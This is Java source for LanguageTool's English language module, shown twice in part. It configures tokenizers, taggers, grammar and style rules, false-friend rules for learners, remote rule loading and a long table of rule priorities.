org.languagetool.rules.*; import org.languagetool.rules.en.*; import org.languagetool.rules.neuralnetwork.NeuralNetworkRuleCreator; import org.languagetool.rules.neuralnetwork.Word2VecModel; import org.languagetool.rules.patterns.PatternRuleLoader; import org.languagetool.synthesis.Synthesizer; import org.languagetool.synthesis.en.EnglishSynthesizer; import org.languagetool.tagging.Tagger; import org.languagetool.tagging.disambiguation.Disambiguator; import org.languagetool.tagging.en.EnglishHybridDisambiguator; import org.languagetool.tagging.en.EnglishTagger; import org.languagetool.tokenizers.SRXSentenceTokenizer; import org.languagetool.tokenizers.SentenceTokenizer; import org.languagetool.tokenizers.Tokenizer; import org.languagetool.tokenizers.en.EnglishWordTokenizer; import java.io.File; import java.io.IOException; import java.io.InputStream; import java.util.ArrayList; import java.util.Arrays; import java.util.List; import java.util.ResourceBundle; import java.util.concurrent.TimeUnit; import java.util.function.Function; /** * Support for English - use the sub classes {@link BritishEnglish}, {@link AmericanEnglish}, * etc. if you need spell checking. * Make sure to call {@link #close()} after using this (currently only relevant if you make * use of {@link EnglishConfusionProbabilityRule}). */ public class English extends Language implements AutoCloseable { private static final LoadingCache<String, List<Rule>> cache = CacheBuilder.newBuilder() .expireAfterWrite(30, TimeUnit.MINUTES) .build(new CacheLoader<String, List<Rule>>() { @Override public List<Rule> load(@NotNull String path) throws IOException { List<Rule> rules = new ArrayList<>(); PatternRuleLoader loader = new PatternRuleLoader(); try (InputStream is = JLanguageTool.getDataBroker().getAsStream(path)) { rules.addAll(loader.getRules(is, path)); } return rules; } }); private static final Language AMERICAN_ENGLISH = new AmericanEnglish(); private LanguageModel languageModel; /** * @deprecated use {@link AmericanEnglish} or {@link BritishEnglish} etc. instead - * they have rules for spell checking, this class doesn't (deprecated since 3.2) */ @Deprecated public English() { } @Override public Language getDefaultLanguageVariant() { return AMERICAN_ENGLISH; } @Override public SentenceTokenizer createDefaultSentenceTokenizer() { return new SRXSentenceTokenizer(this); } @Override public String getName() { return "English"; } @Override public String getShortCode() { return "en"; } @Override public String[] getCountries() { return new String[]{}; } @NotNull @Override public Tagger createDefaultTagger() { return EnglishTagger.INSTANCE; } @Nullable @Override public Chunker createDefaultChunker() { return new EnglishChunker(); } @Nullable @Override public Synthesizer createDefaultSynthesizer() { return new EnglishSynthesizer(this); } @Override public Disambiguator createDefaultDisambiguator() { return new EnglishHybridDisambiguator(); } @Override public Tokenizer createDefaultWordTokenizer() { return new EnglishWordTokenizer(); } @Override public synchronized LanguageModel getLanguageModel(File indexDir) throws IOException { languageModel = initLanguageModel(indexDir, languageModel); return languageModel; } @Override public synchronized Word2VecModel getWord2VecModel(File indexDir) throws IOException { return new Word2VecModel(indexDir + File.separator + getShortCode()); } @Override public Contributor[] getMaintainers() { return new Contributor[] { new Contributor("Mike Unwalla"), Contributors.MARCIN_MILKOWSKI, Contributors.DANIEL_NABER }; } @Override public LanguageMaintainedState getMaintainedState() { return LanguageMaintainedState.ActivelyMaintained; } @Override public List<Rule> getRelevantRules(ResourceBundle messages, UserConfig userConfig, Language motherTongue, List<Language> altLanguages) throws IOException { List<Rule> allRules = new ArrayList<>(); if (motherTongue != null) { if ("de".equals(motherTongue.getShortCode())) { allRules.addAll(cache.getUnchecked("/org/languagetool/rules/en/grammar-l2-de.xml")); } else if ("fr".equals(motherTongue.getShortCode())) { allRules.addAll(cache.getUnchecked("/org/languagetool/rules/en/grammar-l2-fr.xml")); } } allRules.addAll(Arrays.asList( new CommaWhitespaceRule(messages, Example.wrong("We had coffee<marker> ,</marker> cheese and crackers and grapes."), Example.fixed("We had coffee<marker>,</marker> cheese and crackers and grapes.")), new DoublePunctuationRule(messages), new UppercaseSentenceStartRule(messages, this, Example.wrong("This house is old. <marker>it</marker> was built in 1950."), Example.fixed("This house is old. <marker>It</marker> was built in 1950.")), new MultipleWhitespaceRule(messages, this), new SentenceWhitespaceRule(messages), new WhiteSpaceBeforeParagraphEnd(messages, this), new WhiteSpaceAtBeginOfParagraph(messages), new EmptyLineRule(messages, this), new LongSentenceRule(messages, userConfig, 40), new LongParagraphRule(messages, this, userConfig), new ParagraphRepeatBeginningRule(messages, this), new PunctuationMarkAtParagraphEnd(messages, this), new PunctuationMarkAtParagraphEnd2(messages, this), // specific to English: new ConsistentApostrophesRule(messages), new EnglishSpecificCaseRule(messages), new EnglishUnpairedBracketsRule(messages, this), new EnglishWordRepeatRule(messages, this), new AvsAnRule(messages), new EnglishWordRepeatBeginningRule(messages, this), new CompoundRule(messages), new ContractionSpellingRule(messages), new EnglishWrongWordInContextRule(messages), new EnglishDashRule(messages), new WordCoherencyRule(messages), new EnglishDiacriticsRule(messages), new EnglishPlainEnglishRule(messages), new EnglishRedundancyRule(messages), new SimpleReplaceRule(messages, this), new ReadabilityRule(messages, this, userConfig, false), new ReadabilityRule(messages, this, userConfig, true) )); return allRules; } @Override public List<Rule> getRelevantLanguageModelRules(ResourceBundle messages, LanguageModel languageModel, UserConfig userConfig) throws IOException { return Arrays.asList( new UpperCaseNgramRule(messages, languageModel, this, userConfig), new EnglishConfusionProbabilityRule(messages, languageModel, this), new EnglishNgramProbabilityRule(messages, languageModel, this) ); } @Override public List<Rule> getRelevantLanguageModelCapableRules(ResourceBundle messages, @Nullable LanguageModel lm, GlobalConfig globalConfig, UserConfig userConfig, Language motherTongue, List<Language> altLanguages) throws IOException { if (lm != null && motherTongue != null && "fr".equals(motherTongue.getShortCode())) { return Arrays.asList( new EnglishForFrenchFalseFriendRule(messages, lm, motherTongue, this) ); } if (lm != null && motherTongue != null && "de".equals(motherTongue.getShortCode())) { return Arrays.asList( new EnglishForGermansFalseFriendRule(messages, lm, motherTongue, this) ); } if (lm != null && motherTongue != null && "es".equals(motherTongue.getShortCode())) { return Arrays.asList( new EnglishForSpaniardsFalseFriendRule(messages, lm, motherTongue, this) ); } if (lm != null && motherTongue != null && "nl".equals(motherTongue.getShortCode())) { return Arrays.asList( new EnglishForDutchmenFalseFriendRule(messages, lm, motherTongue, this) ); } return Arrays.asList(); } @Override public boolean hasNGramFalseFriendRule(Language motherTongue) { return motherTongue != null && ( // Note: extend EnglishForL2SpeakersFalseFriendRuleTest.testMessageDetailData() // if you add a language here "de".equals(motherTongue.getShortCode()) || "fr".equals(motherTongue.getShortCode()) || "es".equals(motherTongue.getShortCode()) || "nl".equals(motherTongue.getShortCode())); } @Override public List<Rule> getRelevantWord2VecModelRules(ResourceBundle messages, Word2VecModel word2vecModel) throws IOException { return NeuralNetworkRuleCreator.createRules(messages, this, word2vecModel); } /** @since 5.1 */ @Override public String getOpeningDoubleQuote() { return "“"; } /** @since 5.1 */ @Override public String getClosingDoubleQuote() { return "”"; } /** @since 5.1 */ @Override public String getOpeningSingleQuote() { return "‘"; } /** @since 5.1 */ @Override public String getClosingSingleQuote() { return "’"; } /** @since 5.1 */ @Override public boolean isAdvancedTypographyEnabled() { return true; } /** * Closes the language model, if any. * @since 2.7 */ @Override public void close() throws Exception { if (languageModel != null) { languageModel.close(); } } @Override protected int getPriorityForId(String id) { switch (id) { case "I_E": return 10; // needs higher prio than EN_COMPOUNDS ("i.e learning") case "EN_DIACRITICS_REPLACE": return 9; // prefer over spell checker (like PHRASE_REPETITION) case "CHILDISH_LANGUAGE": return 8; // prefer over spell checker case "RUDE_SARCASTIC": return 6; // prefer over spell checker case "FOR_NOUN_SAKE": return 6; // prefer over PROFANITY (e.g. "for fuck sake") case "YEAR_OLD_HYPHEN": return 6; // higher prio than MISSING_HYPHEN case "MISSING_HYPHEN": return 5; case "TRANSLATION_RULE": return 5; // Premium case "WRONG_APOSTROPHE": return 5; case "DOS_AND_DONTS": return 3; case "EN_COMPOUNDS": return 2; case "ABBREVIATION_PUNCTUATION": return 2; case "FEDEX": return 2; // higher prio than many verb rules (e.g. MD_BASEFORM) case "LIFE_COMPOUNDS": return 1; case "DRIVE_THROUGH_HYPHEN": return 1; // higher prio than agreement rules case "CAUSE_COURSE": return 1; // higher prio than CAUSE_BECAUSE case "AN_AND": return 1; // higher prio than A_MY and DT_PRP case "HER_S": return 1; // higher prio than THEIR_S case "COVID_19": return 1; case "OTHER_WISE_COMPOUND": return 1; case "ON_EXCEL": return 1; case "IF_VB_PCT": return 1; // higher prio than IF_VB case "CAUSE_BECAUSE": return 1; // higher prio than MISSING_TO_BETWEEN_BE_AND_VB case "MAY_MANY": return 1; // higher prio than MAY_MANY_MY case "BOUT_TO": return 1; // higher prio than PRP_VB case "HAVE_HAVE": return 1; // higher prio than HE_D_VBD case "LUV": return 1; // higher prio than spell checker case "DAT": return 1; // higher prio than spell checker case "MAC_OS": return 1; // higher prio than spell checker case "BESTEST": return 1; // higher prio than spell checker case "OFF_OF": return 1; // higher prio than ADJECTIVE_ADVERB case "SHELL_COMPOUNDS": return 1; // higher prio than HELL case "HANDS_ON_HYPHEN": return 1; // higher prio than A_NNS case "QUIET_QUITE": return 1; // higher prio than A_QUITE_WHILE case "A_OK": return 1; // prefer over A_AN case "I_A": return 1; // higher prio than I_IF case "GOT_GO": return 1; // higher prio than MD_BASEFORM case "THERE_FORE": return 1; // higher prio than FORE_FOR case "PRP_NO_VB": return 1; // higher prio than I_IF case "FOLLOW_UP": return 1; // higher prio than MANY_NN case "IT_SOMETHING": return 1; // higher prio than IF_YOU_ANY and IT_THE_PRP case "NO_KNOW": return 1; // higher prio than DOUBLE_NEGATIVE case "WILL_BASED_ON": return 1; // higher prio than MD_BASEFORM / PRP_PAST_PART case "DON_T_AREN_T": return 1; // higher prio than DID_BASEFORM case "WILL_BECOMING": return 1; // higher prio than MD_BASEFORM case "WOULD_NEVER_VBN": return 1; // higher prio than MD_BASEFORM case "MD_APPRECIATED": return 1; // higher prio than MD_BASEFORM case "MONEY_BACK_HYPHEN": return 1; // higher prio than A_UNCOUNTABLE case "WORLDS_BEST": return 1; // higher prio than THE_SUPERLATIVE case "STEP_COMPOUNDS": return 1; // higher prio than STARS_AND_STEPS case "WON_T_TO": return 1; // higher prio than DON_T_AREN_T case "WAN_T": return 1; // higher prio than DON_T_AREN_T case "THE_US": return 1; // higher prio than DT_PRP case "THE_IT": return 1; // higher prio than DT_PRP case "THANK_YOU_MUCH": return 1; // higher prio than other rules case "TO_DO_HYPHEN": return 1; // higher prio than other rules case "A_NUMBER_NNS": return 1; // higher prio than A_NNS case "A_HUNDREDS": return 1; // higher prio than A_NNS case "NOW_A_DAYS": return 1; // higher prio than A_NNS case "COUPLE_OF_TIMES": return 1; // higher prio than A_NNS case "A_WINDOWS": return 1; // higher prio than A_NNS case "A_SCISSOR": return 1; // higher prio than A_NNS case "A_SNICKERS": return 1; // higher prio than A_NNS case "ROUND_A_BOUT": return 1; // higher prio than A_NNS case "A_NNS_BEST_NN": return 1; // higher prio than A_NNS case "A_BACHELORS_IN": return 1; // higher prio than A_NNS case "NEITHER_NOR": return 1; // higher prio than COMMA_COMPOUND_SENTENCE case "FOR_AWHILE": return 1; // higher prio than COMMA_COMPOUND_SENTENCE case "A_BUT": return 1; // higher prio than COMMA_COMPOUND_SENTENCE case "MAY_BE": return 1; // higher prio than IS_IT_MAY (premium rule) case "BORN_IN": return 1; // higher prio than PRP_PAST_PART case "DO_TO": return 1; // higher prio than HAVE_PART_AGREEMENT case "CURIOS_CURIOUS": return 1; // higher prio than A_NNS and POSSESSIVE_APOSTROPHE case "INCORRECT_POSSESSIVE_APOSTROPHE": return 1; // higher prio than THIS_NNS case "THIS_YEARS_POSSESSIVE_APOSTROPHE": return 1; // higher prio than THIS_NNS case "SPURIOUS_APOSTROPHE": return 1; // higher prio than THIS_NNS case "IN_THIS_REGARDS": return 1; // higher prio than THIS_NNS case "NO_WHERE": return 1; // higher prio than NOW case "APOSTROPHE_VS_QUOTE": return 1; // higher prio than EN_QUOTES case "COMMA_PERIOD": return 1; // higher prio than COMMA_PARENTHESIS_WHITESPACE case "HERE_HEAR": return 1; // higher prio than ENGLISH_WORD_REPEAT_RULE case "LIGATURES": return 1; // prefer over spell checker case "APPSTORE": return 1; // prefer over spell checker case "INCORRECT_CONTRACTIONS": return 1; // prefer over EN_CONTRACTION_SPELLING case "DONT_T": return 1; // prefer over EN_CONTRACTION_SPELLING case "WHATS_APP": return 1; // prefer over EN_CONTRACTION_SPELLING case "NON_STANDARD_COMMA": return 1; // prefer over spell checker case "NON_STANDARD_ALPHABETIC_CHARACTERS": return 1; // prefer over spell checker case "WONT_CONTRACTION": return 1; // prefer over WONT_WANT case "YOU_GOOD": return 1; // prefer over PRP_PAST_PART case "THAN_THANK": return 1; // prefer over THAN_THEN case "CD_NN_APOSTROPHE_S": return 1; // prefer over CD_NN and LOWERCASE_NAME_APOSTROPHE_S case "IT_IF": return 1; // needs higher prio than PRP_COMMA and IF_YOU_ANY case "FINE_TUNE_COMPOUNDS": return 1; // prefer over less specific rules case "WHAT_IS_YOU": return 1; // prefer over HOW_DO_I_VB, NON3PRS_VERB case "SUPPOSE_TO": return 1; // prefer over HOW_DO_I_VB case "SEEN_SEEM": return 1; // prefer over PRP_PAST_PART case "PROFANITY": return 1; // prefer over spell checker (less prio than EN_COMPOUNDS) case "THE_THEM": return 1; // prefer over TO_TWO case "THERE_THEIR": return 1; // prefer over GO_TO_HOME case "IT_IS_DEPENDING_ON": return 1; // prefer over PROGRESSIVE_VERBS case "IRREGARDLESS": return 1; // prefer over spell checker case "WANNA": return 1; // prefer over spell checker case "LOOK_FORWARD_TO": return 1; // prefer over LOOK_FORWARD_NOT_FOLLOWED_BY_TO case "LOOK_SLIKE": return 1; // higher prio than prem:SINGULAR_NOUN_VERB_AGREEMENT case "ANYWAYS": return -1; // higher prio than spell checker case "MISSING_GENITIVE": return -1; // prefer over spell checker (like EN_SPECIFIC_CASE) case "EN_UNPAIRED_BRACKETS": return -1; // less priority than rules that suggest the correct brackets case "NEEDS_FIXED": return -1; // less priority than MISSING_TO_BEFORE_A_VERB case "BLACK_SEA": return -1; // less priority than SEA_COMPOUNDS case "A_TO": return -1; // less priority than other rules that offer suggestions case "MANY_NN": return -1; // less priority than PUSH_UP_HYPHEN, SOME_FACULTY case "WE_BE": return -1; case "A_LOT_OF_NN": return -1; case "IT_VBZ": return -1; case "ORDER_OF_WORDS_WITH_NOT": return -1; // less prio than punctuation rules case "ADVERB_WORD_ORDER_10_TEMP": return 1; case "ADVERB_WORD_ORDER": return -1; // less prio than PRP_PAST_PART // case "IT_IS_2": return -1; // needs higher prio than BEEN_PART_AGREEMENT case "A_RB_NN": return -1; // prefer other more specific rules (e.g. QUIET_QUITE, A_QUITE_WHILE) case "DT_RB_IN": return -1; // prefer other more specific rules case "VERB_NOUN_CONFUSION": return -1; // prefer other more specific rules case "NOUN_VERB_CONFUSION": return -1; // prefer other more specific rules case "PLURAL_VERB_AFTER_THIS": return -1; // prefer other more specific rules (e.g. COMMA_TAG_QUESTION) case "BE_RB_BE": return -1; // prefer other more specific rules case "IT_ITS": return -1; // prefer other more specific rules case "ENGLISH_WORD_REPEAT_RULE": return -1; // prefer other more specific rules (e.g. IT_IT) case "PRP_MD_NN": return -1; // prefer other more specific rules (e.g. MD_ABLE, WONT_WANT) case "NON_ANTI_PRE_JJ": return -1; // prefer other more specific rules case "DT_JJ_NO_NOUN": return -1; // prefer other more specific rules (e.g. THIRD_PARTY) case "AGREEMENT_SENT_START": return -1; // prefer other more specific rules case "HAVE_PART_AGREEMENT": return -1; // prefer other more specific rules case "PREPOSITION_VERB": return -1; // prefer other more specific rules case "EN_A_VS_AN": return -1; // prefer other more specific rules (with suggestions, e.g. AN_ALSO) case "CD_NN": return -1; // prefer other more specific rules (with suggestions) case "ATD_VERBS_TO_COLLOCATION": return -1; // prefer other more specific rules (with suggestions) case "ADVERB_OR_HYPHENATED_ADJECTIVE": return -1; // prefer other more specific rules (with suggestions) case "GOING_TO_VBD": return -1; // prefer other more specific rules (with suggestions, e.g. GOING_TO_JJ) case "MISSING_PREPOSITION": return -1; // prefer other more specific rules (with suggestions) case "BE_TO_VBG": return -1; // prefer other more specific rules (with suggestions) case "NON3PRS_VERB": return -1; // prefer other more specific rules (with suggestions, e.g. DONS_T) case "DID_FOUND_AMBIGUOUS": return -1; // prefer other more specific rules (e.g. TWO_CONNECTED_MODAL_VERBS) case "BE_I_BE_GERUND": return -1; // prefer other more specific rules (with suggestions) case "VBZ_VBD": return -1; // prefer other more specific rules (e.g. IS_WAS) case "SUPERLATIVE_THAN": return -1; // prefer other more specific rules case "UNLIKELY_OPENING_PUNCTUATION": return -1; // prefer other more specific rules case "METRIC_UNITS_EN_IMPERIAL": return -1; // prefer MILE_HYPHEN case "METRIC_UNITS_EN_GB": return -1; // prefer MILE_HYPHEN case "COMMA_COMPOUND_SENTENCE": return -1; // prefer other rules case "COMMA_COMPOUND_SENTENCE_2": return -1; // prefer other rules case "REPEATED_VERBS": return -1; // prefer other rules case "PRP_RB_NO_VB": return -2; // prefer other more specific rules (with suggestions) case "PRP_VBG": return -2; // prefer other more specific rules (with suggestions, prefer over HE_VERB_AGR) case "PRP_VBZ": return -2; // prefer other more specific rules (with suggestions) case "BE_VBP_IN": return -2; // prefer over BEEN_PART_AGREEMENT case "BEEN_PART_AGREEMENT": return -3; // prefer other more specific rules (e.g. VARY_VERY, VB_NN) case "A_INFINITIVE": return -3; // prefer other more specific rules (with suggestions, e.g. PREPOSITION_VERB, THE_TO) case "HE_VERB_AGR": return -3; // prefer other more specific rules (e.g. PRP_VBG) case "PRP_JJ": return -3; // prefer other rules (e.g. PRP_VBG, IT_IT and ADJECTIVE_ADVERB, PRP_ABLE, PRP_NEW, MD_IT_JJ) case "PRONOUN_NOUN": return -3; // prefer other rules (e.g. PRP_VB, PRP_JJ) case "INDIAN_ENGLISH": return -3; // prefer grammar rules, but higher prio than spell checker case "GONNA_TEMP": return -3; case "PRP_THE": return -4; // prefer other rules (e.g. I_A, PRP_JJ, IF_YOU_ANY, I_AN) case "GONNA": return -4; // prefer over spelling rules case "WHATCHA": return -4; // prefer over spelling rules case "DONTCHA": return -4; // prefer over spelling rules case "GOTCHA": return -4; // prefer over spelling rules case "OUTTA": return -4; // prefer over spelling rules case "Y_ALL": return -4; // prefer over spelling rules case "GIMME": return -4; // prefer over spelling rules case "LEMME": return -4; // prefer over spelling rules case "MORFOLOGIK_RULE_EN_US": return -10; // more specific rules (e.g. L2 rules) have priority case "MORFOLOGIK_RULE_EN_GB": return -10; // more specific rules (e.g. L2 rules) have priority case "MORFOLOGIK_RULE_EN_CA": return -10; // more specific rules (e.g. L2 rules) have priority case "MORFOLOGIK_RULE_EN_ZA": return -10; // more specific rules (e.g. L2 rules) have priority case "MORFOLOGIK_RULE_EN_NZ": return -10; // more specific rules (e.g. L2 rules) have priority case "MORFOLOGIK_RULE_EN_AU": return -10; // more specific rules (e.g. L2 rules) have priority case "TWO_CONNECTED_MODAL_VERBS": return -15; case "PRP_VB": return -25; // prefer other rules (with suggestions, e.g. confusion rules) case "WANT_TO_NN": return -25; // prefer more specific rules that give a suggestion case "QUESTION_WITHOUT_VERB": return -25; // prefer more specific rules that give a suggestion case "SENTENCE_FRAGMENT": return -50; // prefer other more important sentence start corrections. case "AI_HYDRA_LEO_MISSING_COMMA": return -51; // prefer comma style rules. case "SENTENCE_FRAGMENT_SINGLE_WORDS": return -51; // prefer other more important sentence start corrections. case "EN_REDUNDANCY_REPLACE": return -510; // style rules should always have the lowest priority. case "EN_PLAIN_ENGLISH_REPLACE": return -511; // style rules should always have the lowest priority. case "THREE_NN": return -600; // style rules should always have the lowest priority. case "SENT_START_NUM": return -600; // style rules should always have the lowest priority. case "PASSIVE_VOICE": return -600; // style rules should always have the lowest priority. case "EG_NO_COMMA": return -600; // style rules should always have the lowest priority. case "IE_NO_COMMA": return -600; // style rules should always have the lowest priority. case "REASON_WHY": return -600; // style rules should always have the lowest priority. case LongSentenceRule.RULE_ID: return -997; case LongParagraphRule.RULE_ID: return -998; } if (id.startsWith("CONFUSION_RULE_")) { return -20; } if (id.startsWith("AI_HYDRA_LEO")) { // prefer more specific rules (also speller) return -11; } if (id.startsWith("AI_EN_G_")) { // prefer more specific rules (also speller) return -21; } if (id.matches("EN_FOR_[A-Z]+_SPEAKERS_FALSE_FRIENDS.*")) { return -21; } return super.getPriorityForId(id); } @Override public Function<Rule, Rule> getRemoteEnhancedRules(ResourceBundle messageBundle, List<RemoteRuleConfig> configs, UserConfig userConfig, Language motherTongue, List<Language> altLanguages, boolean inputLogging) throws IOException { Function<Rule, Rule> fallback = super.getRemoteEnhancedRules(messageBundle, configs, userConfig, motherTongue, altLanguages, inputLogging); RemoteRuleConfig bert = RemoteRuleConfig.getRelevantConfig(BERTSuggestionRanking.RULE_ID, configs); return original -> { if (original.isDictionaryBasedSpellingRule() && original.getId().startsWith("MORFOLOGIK_RULE_EN")) { if (bert != null) { return new BERTSuggestionRanking(this, original, bert, inputLogging); } } return fallback.apply(original); }; } @Override public List<Rule> getRelevantRemoteRules(ResourceBundle messageBundle, List<RemoteRuleConfig> configs, GlobalConfig globalConfig, UserConfig userConfig, Language motherTongue, List<Language> altLanguages, boolean inputLogging) throws IOException { List<Rule> rules = new ArrayList<>(super.getRelevantRemoteRules( messageBundle, configs, globalConfig, userConfig, motherTongue, altLanguages, inputLogging)); // no description needed - matches based on automatically created rules with descriptions provided by remote server rules.addAll(GRPCRule.createAll(this, configs, inputLogging, "AI_EN_", "INTERNAL - dynamically loaded rule supported by remote server")); rules.addAll(GRPCRule.createAll(this, configs, inputLogging, "AI_HYDRA_LEO", "INTERNAL - dynamically loaded rule supported by remote server")); return rules; } }
languagetool-language-modules/en/src/main/java/org/languagetool/language/English.java
/* LanguageTool, a natural language style checker * Copyright (C) 2007 Daniel Naber (http://www.danielnaber.de) * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2.1 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, write to the Free Software * Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 * USA */ package org.languagetool.language; import com.google.common.cache.CacheBuilder; import com.google.common.cache.CacheLoader; import com.google.common.cache.LoadingCache; import org.jetbrains.annotations.NotNull; import org.jetbrains.annotations.Nullable; import org.languagetool.*; import org.languagetool.chunking.Chunker; import org.languagetool.chunking.EnglishChunker; import org.languagetool.languagemodel.LanguageModel; import org.languagetool.rules.*; import org.languagetool.rules.en.*; import org.languagetool.rules.neuralnetwork.NeuralNetworkRuleCreator; import org.languagetool.rules.neuralnetwork.Word2VecModel; import org.languagetool.rules.patterns.PatternRuleLoader; import org.languagetool.synthesis.Synthesizer; import org.languagetool.synthesis.en.EnglishSynthesizer; import org.languagetool.tagging.Tagger; import org.languagetool.tagging.disambiguation.Disambiguator; import org.languagetool.tagging.en.EnglishHybridDisambiguator; import org.languagetool.tagging.en.EnglishTagger; import org.languagetool.tokenizers.SRXSentenceTokenizer; import org.languagetool.tokenizers.SentenceTokenizer; import org.languagetool.tokenizers.Tokenizer; import org.languagetool.tokenizers.en.EnglishWordTokenizer; import java.io.File; import java.io.IOException; import java.io.InputStream; import java.util.ArrayList; import java.util.Arrays; import java.util.List; import java.util.ResourceBundle; import java.util.concurrent.TimeUnit; import java.util.function.Function; /** * Support for English - use the sub classes {@link BritishEnglish}, {@link AmericanEnglish}, * etc. if you need spell checking. * Make sure to call {@link #close()} after using this (currently only relevant if you make * use of {@link EnglishConfusionProbabilityRule}). */ public class English extends Language implements AutoCloseable { private static final LoadingCache<String, List<Rule>> cache = CacheBuilder.newBuilder() .expireAfterWrite(30, TimeUnit.MINUTES) .build(new CacheLoader<String, List<Rule>>() { @Override public List<Rule> load(@NotNull String path) throws IOException { List<Rule> rules = new ArrayList<>(); PatternRuleLoader loader = new PatternRuleLoader(); try (InputStream is = JLanguageTool.getDataBroker().getAsStream(path)) { rules.addAll(loader.getRules(is, path)); } return rules; } }); private static final Language AMERICAN_ENGLISH = new AmericanEnglish(); private LanguageModel languageModel; /** * @deprecated use {@link AmericanEnglish} or {@link BritishEnglish} etc. instead - * they have rules for spell checking, this class doesn't (deprecated since 3.2) */ @Deprecated public English() { } @Override public Language getDefaultLanguageVariant() { return AMERICAN_ENGLISH; } @Override public SentenceTokenizer createDefaultSentenceTokenizer() { return new SRXSentenceTokenizer(this); } @Override public String getName() { return "English"; } @Override public String getShortCode() { return "en"; } @Override public String[] getCountries() { return new String[]{}; } @NotNull @Override public Tagger createDefaultTagger() { return EnglishTagger.INSTANCE; } @Nullable @Override public Chunker createDefaultChunker() { return new EnglishChunker(); } @Nullable @Override public Synthesizer createDefaultSynthesizer() { return new EnglishSynthesizer(this); } @Override public Disambiguator createDefaultDisambiguator() { return new EnglishHybridDisambiguator(); } @Override public Tokenizer createDefaultWordTokenizer() { return new EnglishWordTokenizer(); } @Override public synchronized LanguageModel getLanguageModel(File indexDir) throws IOException { languageModel = initLanguageModel(indexDir, languageModel); return languageModel; } @Override public synchronized Word2VecModel getWord2VecModel(File indexDir) throws IOException { return new Word2VecModel(indexDir + File.separator + getShortCode()); } @Override public Contributor[] getMaintainers() { return new Contributor[] { new Contributor("Mike Unwalla"), Contributors.MARCIN_MILKOWSKI, Contributors.DANIEL_NABER }; } @Override public LanguageMaintainedState getMaintainedState() { return LanguageMaintainedState.ActivelyMaintained; } @Override public List<Rule> getRelevantRules(ResourceBundle messages, UserConfig userConfig, Language motherTongue, List<Language> altLanguages) throws IOException { List<Rule> allRules = new ArrayList<>(); if (motherTongue != null) { if ("de".equals(motherTongue.getShortCode())) { allRules.addAll(cache.getUnchecked("/org/languagetool/rules/en/grammar-l2-de.xml")); } else if ("fr".equals(motherTongue.getShortCode())) { allRules.addAll(cache.getUnchecked("/org/languagetool/rules/en/grammar-l2-fr.xml")); } } allRules.addAll(Arrays.asList( new CommaWhitespaceRule(messages, Example.wrong("We had coffee<marker> ,</marker> cheese and crackers and grapes."), Example.fixed("We had coffee<marker>,</marker> cheese and crackers and grapes.")), new DoublePunctuationRule(messages), new UppercaseSentenceStartRule(messages, this, Example.wrong("This house is old. <marker>it</marker> was built in 1950."), Example.fixed("This house is old. <marker>It</marker> was built in 1950.")), new MultipleWhitespaceRule(messages, this), new SentenceWhitespaceRule(messages), new WhiteSpaceBeforeParagraphEnd(messages, this), new WhiteSpaceAtBeginOfParagraph(messages), new EmptyLineRule(messages, this), new LongSentenceRule(messages, userConfig, 40), new LongParagraphRule(messages, this, userConfig), new ParagraphRepeatBeginningRule(messages, this), new PunctuationMarkAtParagraphEnd(messages, this), new PunctuationMarkAtParagraphEnd2(messages, this), // specific to English: new ConsistentApostrophesRule(messages), new EnglishSpecificCaseRule(messages), new EnglishUnpairedBracketsRule(messages, this), new EnglishWordRepeatRule(messages, this), new AvsAnRule(messages), new EnglishWordRepeatBeginningRule(messages, this), new CompoundRule(messages), new ContractionSpellingRule(messages), new EnglishWrongWordInContextRule(messages), new EnglishDashRule(messages), new WordCoherencyRule(messages), new EnglishDiacriticsRule(messages), new EnglishPlainEnglishRule(messages), new EnglishRedundancyRule(messages), new SimpleReplaceRule(messages, this), new ReadabilityRule(messages, this, userConfig, false), new ReadabilityRule(messages, this, userConfig, true) )); return allRules; } @Override public List<Rule> getRelevantLanguageModelRules(ResourceBundle messages, LanguageModel languageModel, UserConfig userConfig) throws IOException { return Arrays.asList( new UpperCaseNgramRule(messages, languageModel, this, userConfig), new EnglishConfusionProbabilityRule(messages, languageModel, this), new EnglishNgramProbabilityRule(messages, languageModel, this) ); } @Override public List<Rule> getRelevantLanguageModelCapableRules(ResourceBundle messages, @Nullable LanguageModel lm, GlobalConfig globalConfig, UserConfig userConfig, Language motherTongue, List<Language> altLanguages) throws IOException { if (lm != null && motherTongue != null && "fr".equals(motherTongue.getShortCode())) { return Arrays.asList( new EnglishForFrenchFalseFriendRule(messages, lm, motherTongue, this) ); } if (lm != null && motherTongue != null && "de".equals(motherTongue.getShortCode())) { return Arrays.asList( new EnglishForGermansFalseFriendRule(messages, lm, motherTongue, this) ); } if (lm != null && motherTongue != null && "es".equals(motherTongue.getShortCode())) { return Arrays.asList( new EnglishForSpaniardsFalseFriendRule(messages, lm, motherTongue, this) ); } if (lm != null && motherTongue != null && "nl".equals(motherTongue.getShortCode())) { return Arrays.asList( new EnglishForDutchmenFalseFriendRule(messages, lm, motherTongue, this) ); } return Arrays.asList(); } @Override public boolean hasNGramFalseFriendRule(Language motherTongue) { return motherTongue != null && ( // Note: extend EnglishForL2SpeakersFalseFriendRuleTest.testMessageDetailData() // if you add a language here "de".equals(motherTongue.getShortCode()) || "fr".equals(motherTongue.getShortCode()) || "es".equals(motherTongue.getShortCode()) || "nl".equals(motherTongue.getShortCode())); } @Override public List<Rule> getRelevantWord2VecModelRules(ResourceBundle messages, Word2VecModel word2vecModel) throws IOException { return NeuralNetworkRuleCreator.createRules(messages, this, word2vecModel); } /** @since 5.1 */ @Override public String getOpeningDoubleQuote() { return "“"; } /** @since 5.1 */ @Override public String getClosingDoubleQuote() { return "”"; } /** @since 5.1 */ @Override public String getOpeningSingleQuote() { return "‘"; } /** @since 5.1 */ @Override public String getClosingSingleQuote() { return "’"; } /** @since 5.1 */ @Override public boolean isAdvancedTypographyEnabled() { return true; } /** * Closes the language model, if any. * @since 2.7 */ @Override public void close() throws Exception { if (languageModel != null) { languageModel.close(); } } @Override protected int getPriorityForId(String id) { switch (id) { case "I_E": return 10; // needs higher prio than EN_COMPOUNDS ("i.e learning") case "EN_DIACRITICS_REPLACE": return 9; // prefer over spell checker (like PHRASE_REPETITION) case 